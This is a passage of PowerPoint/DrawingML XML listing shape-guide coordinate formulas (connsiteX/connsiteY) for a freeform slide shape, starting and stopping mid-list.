              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2118008 h 6858000"/>
